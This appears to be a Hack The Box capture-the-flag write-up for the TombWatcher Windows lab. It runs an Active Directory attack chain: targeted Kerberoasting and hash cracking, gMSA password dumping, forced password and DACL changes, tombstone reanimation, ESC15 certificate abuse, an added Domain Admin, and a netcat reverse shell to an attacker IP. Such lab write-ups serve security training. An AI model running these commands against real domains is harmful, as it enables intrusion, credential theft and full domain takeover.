Hack The Box / WINDOWS / 2026-03-18
Hack The Box — TombWatcher (Windows)
Kerberoasting and delegated AD abuse to pivot across users, tombstone reanimation to recover cert_admin, then ESC15 certificate abuse to gain Domain Admin and root.
Target
- IP:
10.129.1.124
Machine information
As is common in real-life Windows penetration tests, you start the TombWatcher box with credentials for the following account:
henry / H3nry_987TGV!
Recon
sudo nmap -sC -sV 10.129.1.124 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-09 03:03:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after: 2025-11-16T00:47:59
| MD5: a396:4dc0:104d:3c58:54e0:19e3:c2ae:0666
|_SHA-1: fe5e:76e2:d528:4a33:8adf:c84e:92e3:900e:4234:ef9c
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49707/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add tombwatcher.htb and dc01.tombwatcher.htb to /etc/hosts.
nxc smb dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.124 445 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
nxc smb dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!' --shares
SMB 10.129.1.124 445 DC01 Share Permissions Remark
SMB 10.129.1.124 445 DC01 ----- ----------- ------
SMB 10.129.1.124 445 DC01 ADMIN$ Remote Admin
SMB 10.129.1.124 445 DC01 C$ Default share
SMB 10.129.1.124 445 DC01 IPC$ READ Remote IPC
SMB 10.129.1.124 445 DC01 NETLOGON READ Logon server share
SMB 10.129.1.124 445 DC01 SYSVOL READ Logon server share
There are no interesting shares.
nxc ldap dc01.tombwatcher.htb -u 'henry' -p 'H3nry_987TGV!'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
LDAP 10.129.1.124 389 DC01 [+] tombwatcher.htb\henry:H3nry_987TGV!
bloodhound-ce-python -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.1.124 -d 'tombwatcher.htb' -dc dc01.tombwatcher.htb -c All --zip
We get a zip.
sudo bloodhound
Upload the zip.
From BloodHound, we see henry has WriteSPN over alfred.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$dafaaff99b5778101aa102c1825923fb$212f14e251a2b7d01fc43929a542ae019b8e2bf4ed07e5e30da125b9375c1bd2c2739bca1a1efb16cd96213e2b48aa27b975eddf16de9cd5679140b8bce32fb61876fe4add3a55215b8b704eae77b996cc851e03faf5a109fb2fc8563eb587e73fc7bd2b254df53a2d95d2150c7fe69757ebe870fe81c8f26bd0637592611fa6ded0f5d0e30326a532917137dc168a5f4b1cb4a421fe1fb782fa94573e676e2f0cc4bc069230c2b876b9fa87895daae2b47ebe2e2fedffc0fe37143f70c3594c46bc4941fa8e4423e3046316ebdf92f6ad1211e79cd3318777da8372058f1018e1a55b1b31279bfabec5ab5a73c7f7fbeb3445878319f8168a7f5632fa69920b27817473bc3465e74f0cba0f4b0d912b4ebf526d11cb8b7289b49dc8206b3a867172df68cb283103da852e90e6b859b5e5d98b109a0a7ea9f47caf98e497ef16134cfea4bd751e91b7bf1361f5950e7aa4b9dbcfaf56157ef17daea9b48f4af5dfc4bc8248bcda3ceb53903a0057a22604c099f539e0db4861c414f1599b0dce64237a2315cf94a361dc72732c7062411e876d98229411372c78f27d0cfa83e8e656acf356acd40eeaf20073393e6e32df5737d0502fa95cfd5022beaaeef71ed9bbec9468c819bbec8fd7e1a25f6badb2479efeae0c5736efad0dd698c97e1fceebefab8b5f0d491165ed30ff114a6dbb83ff2d6eb2a6ffe0f4f2c2a0c3b697b569a11e20738f0952f1a636af24990bb22df2c505ba2c0841cebe2a26d1ddcb05e011748f9b8b9f8fe22c84ad5558ff504cf67dc228e9ca17b3067ef87630657c8dfc204c6386d3d7481e1822b2b44f530eb3afc290484f8848a606fa4728d433e5f16bd4ea389f751e272a68dd113b79801b55dbb6b9de9deb5c8ea40f9671e3b83089874f3498bfe9fbf0a8ecf1b2f90b81571c169b5bc2e2f22a49e52bdbc946b3c2ee2f86e97509642fde28e05115bb9da696bde502b968993c1a130461e87eb4ab6909c4724d239abcba26a175fdfb8b74f019e0f6ecd5ef2ebbfa6dd998d778f328ac59d75b09fbfd5fa8ac04a7b3a8be619cfb4c70da89dc69330a09cf98e4ab596b6778c6c4e0cd5f485ed451ee17b38d322d2d78195c21928b57719a7cf5b8ba5d90f2a722dab71c61431cb0bcc6fc2366681205cd8f19019d4c0dc007eaa430af0f5af5e214258b223d5805954b6ea849fcdc33fee02a44d4aefc8f5765e2a83d08f112bf1f81b68eb1bd03057e53b4fa277f1ae6555e72b64b3ce450846be924674167042835a018e82072113ccfd56c55982130ab2d7a4370521eed3cef6a76f5cf9210d241d651bc14ffc700537aced063bac5d117bece9813d497089b1841ccb896f3d8e5324f55776eaf45e9e49ff7c355d2ea20edbb21e28651a5f57b529d6f5cc633e9eaf5041a48288b7f0c058f7d91ee6918a3142705cc394d4988f08e37eebb93e27ce7b490f526c20305
[VERBOSE] SPN removed successfully for (Alfred)
Put the hash into a hash file.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
We get password:
basketball
nxc smb dc01.tombwatcher.htb -u 'alfred' -p 'basketball'
SMB 10.129.1.124 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.1.124 445 DC01 [+] tombwatcher.htb\alfred:basketball
From BloodHound we notice alfred has AddSelf toward group infrastructure.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.tombwatcher.htb' -d tombwatcher.htb --dc-ip 10.129.1.124 -u 'alfred' -p 'basketball' add groupMember 'infrastructure' 'alfred'
[+] alfred added to infrastructure
From BloodHound we see group infrastructure has ReadGMSAPassword toward machine account ansible_dev$.
Download gMSADumper:
- https://github.com/micahvandeusen/gMSADumper
python gMSADumper/gMSADumper.py -u 'alfred' -p 'basketball' -d tombwatcher.htb -l dc01.tombwatcher.htb
Users or groups who can read password for ansible_dev$:
> Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
getTGT.py tombwatcher.htb/'ansible_dev$' -hashes ':1c37d00093dc2a5f25176bf2d474afdc' -dc-ip 10.129.1.124
[*] Saving ticket in ansible_dev$.ccache
export KRB5CCNAME='ansible_dev$.ccache'
nxc smb dc01.tombwatcher.htb -k --use-kcache
SMB dc01.tombwatcher.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB dc01.tombwatcher.htb 445 DC01 [+] tombwatcher.htb\ansible_dev$ from ccache
From BloodHound we see ansible_dev$ has ForceChangePassword toward user sam.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip 10.129.1.124 -k set password 'sam' '!Kali12345678!'
[+] Password changed successfully!
From BloodHound we see sam has WriteOwner toward user john.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'sam' -p '!Kali12345678!' set owner 'john' 'sam'
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john
dacledit.py -action 'write' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'!Kali12345678!'
[*] DACL modified successfully!
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'sam' -p '!Kali12345678!' set password 'john' '!Kali12345678!'
[+] Password changed successfully!
From BloodHound we see user john is in group Remote Management Users.
evil-winrm -i dc01.tombwatcher.htb -u 'john' -p '!Kali12345678!'
We can retrieve the user flag.
Tombstone reanimation and ADCS abuse
Upload PowerView.ps1 to the victim:
- https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1
. .\PowerView.ps1
Find-InterestingDomainAcl
ObjectDN : DC=tombwatcher,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 45ec5156-db7e-47bb-b53f-dbeb2d03c40f
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-1392491010-1358638721-2126982587-1106
IdentityReferenceName : john
IdentityReferenceDomain : tombwatcher.htb
IdentityReferenceDN : CN=john,CN=Users,DC=tombwatcher,DC=htb
IdentityReferenceClass : user
ObjectAceType 45ec5156-db7e-47bb-b53f-dbeb2d03c40f corresponds to Reanimate-Tombstones:
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb
Here:
- https://www.ibm.com/docs/en/storage-protect/8.1.24?topic=rwiado-reanimate-tombstone-objects-restoring-from-system-state-backup
It states:
Tombstone reanimation is a process to restore an object that had been deleted from Active Directory. When an object is deleted from Active Directory, it is not physically erased, but only marked as deleted. It is then possible to reanimate (restore) the object.
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
There are three users cert_admin, with SIDs:
S-1-5-21-1392491010-1358638721-2126982587-1109S-1-5-21-1392491010-1358638721-2126982587-1110S-1-5-21-1392491010-1358638721-2126982587-1111
Which one should be restored?
Check available certificates:
certipy find -dc-ip 10.129.74.157 -u 'john' -p '!Kali12345678!' -target tombwatcher.htb -text -output certs
cat certs_Certipy.txt
We notice that in certificate WebServer, SID S-1-5-21-1392491010-1358638721-2126982587-1111 can enroll.
So we restore this user.
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
Take note of the distinguished name:
CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Now restore the user:
Restore-ADObject -Identity 'CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb'
Get-DomainUser
We also see cert_admin, with distinguished name CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb.
So it belongs to OU ADCS.
From BloodHound we see john has GenericAll over OU ADCS.
This means it also has GenericAll over users in that OU, including cert_admin.
python3 bloodyAD/bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb --dc-ip dc01.tombwatcher.htb -u 'john' -p '!Kali12345678!' set password 'cert_admin' '!Kali12345678!'
[+] Password changed successfully!
certipy find -dc-ip 10.129.74.157 -u 'cert_admin' -p '!Kali12345678!' -target dc01.tombwatcher.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
We can perform an ESC15 attack using template WebServer.
Useful article:
- https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760
certipy req -ca tombwatcher-CA-1 -dc-ip 10.129.74.157 -u 'cert_admin@tombwatcher.htb' -p '!Kali12345678!' -template WebServer -application-policies 'Client Authentication' -upn 'Administrator@tombwatcher.htb'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
If we now run:
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx
It does not work, as explained in the article.
But we can get an LDAP shell with Certipy:
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx -ldap-shell
Problem: on modern distros we get:
ldap3.core.exceptions.LDAPSocketOpenError: ("('socket ssl wrapping error: [SSL: CA_MD_TOO_WEAK] ca md too weak (_ssl.c:4086)',)",)
The certificate issued by the target uses a deprecated signature system, and modern OpenSSL/libssl binaries reject it.
Note: Certipy is written in Python, and Python distributions include their own OpenSSL/libssl binaries.
So we can create another conda environment with an older Python build that includes older OpenSSL/libssl binaries.
conda create --name test python=3.7
conda activate test
pip install --upgrade certipy-ad
certipy auth -dc-ip 10.129.94.81 -pfx administrator.pfx -ldap-shell
We get an LDAP shell.
# add_user fake01
Attempting to create user in: %s CN=Users,DC=tombwatcher,DC=htb
Adding new user with username: fake01 and password: I_h:',SYy8Hct,n result: OK
# add_user_to_group fake01 "Domain Admins"
Adding user: fake01 to group Domain Admins result: OK
# exit
Bye!
Start netcat listener:
rlwrap nc -vlnp 4444
Upload nc64.exe and RunasCs.exe to the target:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
- https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'fake01' "I_h:',SYy8Hct,n" 'C:\tmp\nc64.exe -e cmd.exe 10.10.14.252 4444'
We get a reverse shell as fake01.
whoami /all
We see fake01 belongs to BUILTIN\Administrators and TOMBWATCHER\Domain Admins.
cd C:\Users\Administrator\Desktop
We can retrieve the root flag:
type root.txt